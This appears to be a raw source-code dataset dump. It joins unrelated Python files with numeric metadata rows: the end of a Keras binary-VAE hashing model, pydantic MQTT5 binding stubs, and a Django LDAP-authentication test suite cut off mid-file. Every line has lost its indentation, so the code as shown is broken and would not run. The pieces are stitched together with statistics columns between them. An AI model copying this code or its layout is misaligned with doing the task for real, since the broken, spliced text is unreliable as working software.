binary_vae.compile(optimizer=opt, loss=BVAE_loss, metrics = [Recon_loss,kl_loss])
if tau_ann:
return binary_vae, encoder,generator ,tau
else:
return binary_vae, encoder,generator
def PSH_GS(data_dim,n_classes,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True,tau_ann=False,beta=0,alpha=1.0,lambda_=1.0,multilabel=False):
if tau_ann:
tau = K.variable(1.0, name="temperature")
else:
tau = K.variable(0.67, name="temperature") #o tau fijo en 0.67=2/3
pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
if summ:
print("pre-encoder network:")
pre_encoder.summary()
generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
if summ:
print("generator network:")
generator.summary()
x = Input(shape=(data_dim,))
hidden = pre_encoder(x)
logits_b = Dense(Nb, activation='linear', name='logits-b')(hidden)
if multilabel:
supervised_layer = Dense(n_classes, activation='sigmoid',name='sup-class')(hidden)#req n_classes
else:
supervised_layer = Dense(n_classes, activation='softmax',name='sup-class')(hidden)#req n_classes
encoder = Model(x, logits_b)
def sampling(logits_b):
#logits_b = K.log(aux/(1-aux) + K.epsilon() )
b = logits_b + sample_gumbel(K.shape(logits_b)) # logits + gumbel noise
return keras.activations.sigmoid( b/tau )
b_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')(logits_b)
output = generator(b_sampled)
Recon_loss = REC_loss
kl_loss = BKL_loss(logits_b)
def SUP_BAE_loss_pointwise(y_true, y_pred):
return Recon_loss(y_true, y_pred) + beta*kl_loss(y_true, y_pred)
margin = Nb/3.0
if multilabel:
pred_loss = my_binary_KL_loss
else:
pred_loss = my_KL_loss
def Hamming_loss(y_true, y_pred):
r = tf.reduce_sum(b_sampled*b_sampled, 1)
r = tf.reshape(r, [-1, 1])
D = r - 2*tf.matmul(b_sampled, tf.transpose(b_sampled)) + tf.transpose(r) #BXB
similar_mask = K.dot(y_true, K.transpose(y_true)) #BXB M_ij = I(y_i = y_j)
loss_hamming = (1.0/Nb)*K.sum(similar_mask*D + (1.0-similar_mask)*K.relu(margin-D))
return lambda_*pred_loss(y_true, y_pred) + loss_hamming
#binary_vae = Model(inputs=[x,y], outputs=output)
#binary_vae.compile(optimizer=opt, loss=SUP_BAE_loss_pointwise, metrics=[Recon_loss,kl_loss])
binary_vae = Model(inputs=x, outputs=[output,supervised_layer])
binary_vae.compile(optimizer=opt, loss=[SUP_BAE_loss_pointwise,Hamming_loss],loss_weights=[1., alpha], metrics=[Recon_loss,kl_loss,pred_loss])
if tau_ann:
return binary_vae, encoder,generator ,tau
else:
return binary_vae, encoder,generator
def SSBVAE(data_dim,n_classes,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True,tau_ann=False,lambda_=0,alpha=1.0,beta=1.0,multilabel=False):
if tau_ann:
tau = K.variable(1.0, name="temperature")
else:
tau = K.variable(0.67, name="temperature") #o tau fijo en 0.67=2/3
pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
if summ:
print("pre-encoder network:")
pre_encoder.summary()
generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
if summ:
print("generator network:")
generator.summary()
x = Input(shape=(data_dim,))
hidden = pre_encoder(x)
logits_b = Dense(Nb, activation='linear', name='logits-b')(hidden) #log(B_j/1-B_j)
if multilabel:
supervised_layer = Dense(n_classes, activation='sigmoid',name='sup-class')(hidden)#req n_classes
else:
supervised_layer = Dense(n_classes, activation='softmax',name='sup-class')(hidden)#req n_classes
encoder = Model(x, logits_b)
def sampling(logits_b):
#logits_b = K.log(aux/(1-aux) + K.epsilon() )
b = logits_b + sample_gumbel(K.shape(logits_b)) # logits + gumbel noise
return keras.activations.sigmoid( b/tau )
b_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')(logits_b)
output = generator(b_sampled)
Recon_loss = REC_loss
kl_loss = BKL_loss(logits_b)
def SUP_BAE_loss_pointwise(y_true, y_pred):
return Recon_loss(y_true, y_pred) + lambda_*kl_loss(y_true, y_pred)
margin = Nb/3.0
if multilabel:
pred_loss = my_binary_KL_loss_stable
else:
pred_loss = my_KL_loss
def Hamming_loss(y_true, y_pred):
#pred_loss = keras.losses.categorical_crossentropy(y_true, y_pred)
r = tf.reduce_sum(b_sampled*b_sampled, 1)
r = tf.reshape(r, [-1, 1])
D = r - 2*tf.matmul(b_sampled, tf.transpose(b_sampled)) + tf.transpose(r) #BXB
similar_mask = K.dot(y_pred, K.transpose(y_pred)) #BXB M_ij = I(y_i = y_j)
loss_hamming = (1.0/Nb)*K.sum(similar_mask*D + (1.0-similar_mask)*K.relu(margin-D))
return beta*pred_loss(y_true, y_pred) + alpha*loss_hamming
binary_vae = Model(inputs=x, outputs=[output,supervised_layer])
binary_vae.compile(optimizer=opt, loss=[SUP_BAE_loss_pointwise,Hamming_loss],loss_weights=[1., 1.], metrics=[Recon_loss,kl_loss,pred_loss])
if tau_ann:
return binary_vae, encoder,generator ,tau
else:
return binary_vae, encoder,generator
| 38.045603
| 148
| 0.672089
| 1,838
| 11,680
| 4.023939
| 0.093036
| 0.027042
| 0.018659
| 0.031098
| 0.871011
| 0.865603
| 0.857761
| 0.842888
| 0.827474
| 0.809221
| 0
| 0.011243
| 0.192808
| 11,680
| 306
| 149
| 38.169935
| 0.773229
| 0.093408
| 0
| 0.77169
| 0
| 0
| 0.047727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.100457
| false
| 0
| 0.031963
| 0.022831
| 0.246575
| 0.045662
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22865f57d0b712c2fd4683b00a65c077c11cd2bd
| 1,139
|
py
|
Python
|
asyncapi_schema_pydantic/v2_3_0/mqtt5_bindings.py
|
albertnadal/asyncapi-schema-pydantic
|
83966bdc11f2d465a10b52cec5ff79d18fa6f5fe
|
[
"MIT"
] | null | null | null |
asyncapi_schema_pydantic/v2_3_0/mqtt5_bindings.py
|
albertnadal/asyncapi-schema-pydantic
|
83966bdc11f2d465a10b52cec5ff79d18fa6f5fe
|
[
"MIT"
] | null | null | null |
asyncapi_schema_pydantic/v2_3_0/mqtt5_bindings.py
|
albertnadal/asyncapi-schema-pydantic
|
83966bdc11f2d465a10b52cec5ff79d18fa6f5fe
|
[
"MIT"
] | null | null | null |
from pydantic import BaseModel, Extra
class Mqtt5ChannelBinding(BaseModel):
"""
This document defines how to describe MQTT 5-specific information on AsyncAPI.
This object MUST NOT contain any properties. Its name is reserved for future use.
"""
class Config:
extra = Extra.forbid
class Mqtt5MessageBinding(BaseModel):
"""
This document defines how to describe MQTT 5-specific information on AsyncAPI.
This object MUST NOT contain any properties. Its name is reserved for future use.
"""
class Config:
extra = Extra.forbid
class Mqtt5OperationBinding(BaseModel):
"""
This document defines how to describe MQTT 5-specific information on AsyncAPI.
This object MUST NOT contain any properties. Its name is reserved for future use.
"""
class Config:
extra = Extra.forbid
class Mqtt5ServerBinding(BaseModel):
"""
This document defines how to describe MQTT 5-specific information on AsyncAPI.
This object MUST NOT contain any properties. Its name is reserved for future use.
"""
class Config:
extra = Extra.forbid
| 22.78
| 85
| 0.703248
| 141
| 1,139
| 5.680851
| 0.262411
| 0.064919
| 0.104869
| 0.139825
| 0.857678
| 0.857678
| 0.857678
| 0.857678
| 0.857678
| 0.857678
| 0
| 0.009238
| 0.239684
| 1,139
| 49
| 86
| 23.244898
| 0.915704
| 0.568042
| 0
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
22e519b0dcbf03b30f8a44ed0349936fbe28ec41
| 77,747
|
py
|
Python
|
tests/tests.py
|
NoNameItem/cool-django-auth-ldap
|
58920e50bc85b7ffa9337468e5e6256dfcfd27e7
|
[
"MIT"
] | null | null | null |
tests/tests.py
|
NoNameItem/cool-django-auth-ldap
|
58920e50bc85b7ffa9337468e5e6256dfcfd27e7
|
[
"MIT"
] | 3
|
2019-11-17T16:52:56.000Z
|
2020-01-24T12:16:59.000Z
|
tests/tests.py
|
NoNameItem/cool-django-auth-ldap
|
58920e50bc85b7ffa9337468e5e6256dfcfd27e7
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2019, Artem Vasin
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import contextlib
import functools
import logging
import os
import pickle
import warnings
from copy import deepcopy
import ldap
import mock
import slapdtest
from django.contrib.auth import authenticate, get_backends
from django.contrib.auth.models import Group, Permission, User
from django.core.cache import cache
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.test.client import RequestFactory
from django.test.utils import override_settings
from cool_django_auth_ldap.backend import LDAPBackend, ldap_error, populate_user
from cool_django_auth_ldap.config import (
GroupOfNamesType,
LDAPGroupQuery,
LDAPSearch,
LDAPSearchUnion,
MemberDNGroupType,
NestedMemberDNGroupType,
PosixGroupType,
)
from cool_django_auth_ldap.models import GroupMapping
from .models import TestUser
def get_backend():
backends = get_backends()
return backends[0]
def _override_settings(**settings):
def decorator(func):
@functools.wraps(func)
def wrapped_test(self, *args, **kwargs):
cm = override_settings(**settings)
cm.enable()
self.addCleanup(cm.disable)
return func(self, *args, **kwargs)
return wrapped_test
return decorator
def spy_ldap(name):
"""
Patch the python-ldap method. The patched method records all calls and
passes execution to the original method.
"""
ldap_method = getattr(ldap.ldapobject.SimpleLDAPObject, name)
ldap_mock = mock.MagicMock()
@functools.wraps(ldap_method)
def wrapped_ldap_method(self, *args, **kwargs):
ldap_mock(*args, **kwargs)
return ldap_method(self, *args, **kwargs)
def decorator(test):
@functools.wraps(test)
def wrapped_test(self, *args, **kwargs):
with mock.patch.object(
ldap.ldapobject.SimpleLDAPObject, name, wrapped_ldap_method
):
return test(self, ldap_mock, *args, **kwargs)
return wrapped_test
return decorator
@contextlib.contextmanager
def catch_signal(signal):
"""Catch Django signal and return the mocked call."""
handler = mock.Mock()
signal.connect(handler)
try:
yield handler
finally:
signal.disconnect(handler)
class LDAPTest(TestCase):
@classmethod
def configure_logger(cls):
logger = logging.getLogger("cool_django_auth_ldap")
formatter = logging.Formatter("LDAP auth - %(levelname)s - %(message)s")
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.CRITICAL)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.configure_logger()
here = os.path.dirname(__file__)
cls.server = slapdtest.SlapdObject()
cls.server.suffix = "o=test"
cls.server.openldap_schema_files = [
"core.schema",
"cosine.schema",
"inetorgperson.schema",
"nis.schema",
]
cls.server.start()
with open(os.path.join(here, "tests.ldif")) as fp:
ldif = fp.read()
cls.server.ldapadd(ldif)
@classmethod
def tearDownClass(cls):
cls.server.stop()
super().tearDownClass()
def setUp(self):
super().setUp()
cache.clear()
def test_options(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
CONNECTION_OPTIONS={ldap.OPT_REFERRALS: 0},
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.ldap_user.connection.get_option(ldap.OPT_REFERRALS), 0)
def test_callable_server_uri(self):
request = RequestFactory().get("/")
cb_mock = mock.Mock(return_value=self.server.ldap_uri)
self._init_settings(
SERVER_URI=lambda request: cb_mock(request),
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
)
user_count = User.objects.count()
user = authenticate(request=request, username="alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
cb_mock.assert_called_with(request)
def test_deprecated_callable_server_uri(self):
self._init_settings(
SERVER_URI=lambda: self.server.ldap_uri,
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
)
user_count = User.objects.count()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
user = authenticate(username="alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
self.assertEqual(len(w), 1)
self.assertEqual(w[0].category, DeprecationWarning)
self.assertEqual(
str(w[0].message),
"Update AUTH_LDAP_SERVER_URI callable tests.tests.<lambda> to "
"accept a positional `request` argument. Support for callables "
"accepting no arguments will be removed in a future version.",
)
def test_simple_bind(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username="alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
def test_default_settings(self):
class MyBackend(LDAPBackend):
default_settings = {
"SERVER_URI": self.server.ldap_uri,
"USER_DN_TEMPLATE": "uid=%(user)s,ou=people,o=test",
}
backend = MyBackend()
user_count = User.objects.count()
user = backend.authenticate(None, username="alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
@_override_settings(
AUTHENTICATION_BACKENDS=[
"cool_django_auth_ldap.backend.LDAPBackend",
"django.contrib.auth.backends.ModelBackend",
]
)
def test_login_with_multiple_auth_backends(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
@_override_settings(
AUTHENTICATION_BACKENDS=[
"cool_django_auth_ldap.backend.LDAPBackend",
"django.contrib.auth.backends.ModelBackend",
]
)
def test_bad_login_with_multiple_auth_backends(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user = authenticate(username="invalid", password="i_do_not_exist")
self.assertIsNone(user)
def test_username_none(self):
self._init_settings()
user = authenticate(username=None, password="password")
self.assertIsNone(user)
@spy_ldap("simple_bind_s")
def test_simple_bind_escaped(self, mock):
""" Bind with a username that requires escaping. """
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user = authenticate(username="alice,1", password="password")
self.assertIsNone(user)
mock.assert_called_once_with("uid=alice\\,1,ou=people,o=test", "password")
def test_new_user_lowercase(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username="Alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
def test_deepcopy(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user = authenticate(username="Alice", password="password")
user = deepcopy(user)
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_auth_custom_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"uid_number": "uidNumber"},
)
user = authenticate(username="Alice", password="password")
self.assertIsInstance(user, TestUser)
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_get_custom_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"uid_number": "uidNumber"},
)
backend = get_backend()
user = authenticate(username="Alice", password="password")
user = backend.get_user(user.id)
self.assertIsInstance(user, TestUser)
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_get_custom_field(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"uid_number": "uidNumber"},
USER_QUERY_FIELD="uid_number",
)
alice = TestUser.objects.create(identifier="abcdef", uid_number=1000)
user = authenticate(username="Alice", password="password")
self.assertIsInstance(user, TestUser)
self.assertEqual(user.pk, alice.pk)
def test_new_user_whitespace(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username=" alice", password="password")
user = authenticate(username="alice ", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
def test_simple_bind_bad_user(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username="evil_alice", password="password")
self.assertIsNone(user)
self.assertEqual(User.objects.count(), user_count)
def test_simple_bind_bad_password(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username="alice", password="bogus")
self.assertIsNone(user)
self.assertEqual(User.objects.count(), user_count)
def test_existing_user(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
User.objects.create(username="alice")
user_count = User.objects.count()
user = authenticate(username="alice", password="password")
# Make sure we only created one user
self.assertIsNotNone(user)
self.assertEqual(User.objects.count(), user_count)
def test_existing_user_insensitive(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
User.objects.create(username="alice")
user = authenticate(username="Alice", password="password")
self.assertIsNotNone(user)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), 1)
def test_convert_username(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
class MyBackend(LDAPBackend):
def ldap_to_django_username(self, username):
return "ldap_%s" % username
def django_to_ldap_username(self, username):
return username[5:]
backend = MyBackend()
user_count = User.objects.count()
user1 = backend.authenticate(None, username="alice", password="password")
user2 = backend.get_user(user1.pk)
self.assertEqual(User.objects.count(), user_count + 1)
self.assertEqual(user1.username, "ldap_alice")
self.assertEqual(user1.ldap_user._username, "alice")
self.assertEqual(user1.ldap_username, "alice")
self.assertEqual(user2.username, "ldap_alice")
self.assertEqual(user2.ldap_user._username, "alice")
self.assertEqual(user2.ldap_username, "alice")
def test_search_bind(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user_count = User.objects.count()
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
self.assertEqual(User.objects.count(), user_count + 1)
@spy_ldap("search_s")
def test_search_bind_escaped(self, mock):
""" Search for a username that requires escaping. """
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user = authenticate(username="alice*", password="password")
self.assertIsNone(user)
mock.assert_called_once_with(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=alice\\2a)", None
)
def test_search_bind_no_user(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uidNumber=%(user)s)"
)
)
user = authenticate(username="alice", password="password")
self.assertIsNone(user)
def test_search_bind_multiple_users(self):
self._init_settings(
USER_SEARCH=LDAPSearch("ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=*)")
)
user = authenticate(username="alice", password="password")
self.assertIsNone(user)
def test_search_bind_bad_password(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user = authenticate(username="alice", password="bogus")
self.assertIsNone(user)
def test_search_bind_with_credentials(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="password",
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
)
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
self.assertIsNotNone(user.ldap_user)
self.assertEqual(user.ldap_user.dn, "uid=alice,ou=people,o=test")
self.assertEqual(
dict(user.ldap_user.attrs),
{
"objectClass": [
"person",
"organizationalPerson",
"inetOrgPerson",
"posixAccount",
],
"cn": ["alice"],
"uid": ["alice"],
"userPassword": ["password"],
"uidNumber": ["1000"],
"gidNumber": ["1000"],
"givenName": ["Alice"],
"sn": ["Adams"],
"homeDirectory": ["/home/alice"],
},
)
def test_search_bind_with_bad_credentials(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="bogus",
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
)
user = authenticate(username="alice", password="password")
self.assertIsNone(user)
def test_unicode_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
)
user = authenticate(username="dreßler", password="password")
self.assertIsNotNone(user)
self.assertEqual(user.username, "dreßler")
self.assertEqual(user.last_name, "Dreßler")
def test_cidict(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user = authenticate(username="alice", password="password")
self.assertIsInstance(user.ldap_user.attrs, ldap.cidict.cidict)
def test_populate_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
self.assertEqual(user.first_name, "Alice")
self.assertEqual(user.last_name, "Adams")
def test_populate_user_with_missing_attribute(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={
"first_name": "givenName",
"last_name": "sn",
"email": "mail",
},
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
self.assertEqual(user.first_name, "Alice")
self.assertEqual(user.last_name, "Adams")
self.assertEqual(user.email, "")
@mock.patch.object(LDAPSearch, "execute", return_value=None)
def test_populate_user_with_bad_search(self, mock_execute):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
self.assertEqual(user.first_name, "")
self.assertEqual(user.last_name, "")
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_authenticate_with_buggy_setter_raises_exception(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "uid_number": "uidNumber"},
)
with self.assertRaisesMessage(Exception, "Oops..."):
authenticate(username="alice", password="password")
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_populate_user_with_buggy_setter_raises_exception(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "uid_number": "uidNumber"},
)
backend = get_backend()
with self.assertRaisesMessage(Exception, "Oops..."):
backend.populate_user("alice")
@spy_ldap("search_s")
def test_populate_with_attrlist(self, mock):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
USER_ATTRLIST=["*", "+"],
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
# lookup user attrs
mock.assert_called_once_with(
"uid=alice,ou=people,o=test", ldap.SCOPE_BASE, "(objectClass=*)", ["*", "+"]
)
def test_bind_as_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
BIND_AS_AUTHENTICATING_USER=True,
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
self.assertEqual(user.first_name, "Alice")
self.assertEqual(user.last_name, "Adams")
def test_signal_populate_user(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
with catch_signal(populate_user) as handler:
user = authenticate(username="alice", password="password")
handler.assert_called_once_with(
signal=populate_user,
sender=LDAPBackend,
user=user,
ldap_user=user.ldap_user,
)
def test_auth_signal_ldap_error(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="bogus",
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
)
def handle_ldap_error(sender, **kwargs):
raise kwargs["exception"]
with catch_signal(ldap_error) as handler:
handler.side_effect = handle_ldap_error
with self.assertRaises(ldap.LDAPError):
authenticate(username="alice", password="password")
handler.assert_called_once()
_args, kwargs = handler.call_args
self.assertEqual(kwargs["context"], "authenticate")
def test_populate_signal_ldap_error(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="bogus",
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
)
backend = get_backend()
user = backend.populate_user("alice")
self.assertIsNone(user)
def test_no_update_existing(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
ALWAYS_UPDATE_USER=False,
)
User.objects.create(username="alice", first_name="Alicia", last_name="Astro")
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertEqual(alice.first_name, "Alicia")
self.assertEqual(alice.last_name, "Astro")
self.assertEqual(bob.first_name, "Robert")
self.assertEqual(bob.last_name, "Barker")
def test_require_group(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
REQUIRE_GROUP="cn=active_gon,ou=groups,o=test",
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNotNone(alice)
self.assertIsNone(bob)
def test_no_new_users(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", NO_NEW_USERS=True
)
user = authenticate(username="alice", password="password")
# No user was created.
self.assertIsNone(user)
self.assertEqual(0, User.objects.count())
def test_simple_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
query = LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test")
self.assertIs(query.resolve(alice.ldap_user), True)
def test_group_query_utf8(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
user = authenticate(username="dreßler", password="password")
query = LDAPGroupQuery("cn=dreßler_gon,ou=query_groups,o=test")
self.assertIs(query.resolve(user.ldap_user), True)
def test_negated_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
query = ~LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test")
self.assertIs(query.resolve(alice.ldap_user), False)
def test_or_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
query = LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test") | LDAPGroupQuery(
"cn=bob_gon,ou=query_groups,o=test"
)
self.assertIs(query.resolve(alice.ldap_user), True)
self.assertIs(query.resolve(bob.ldap_user), True)
def test_and_group_query(self):
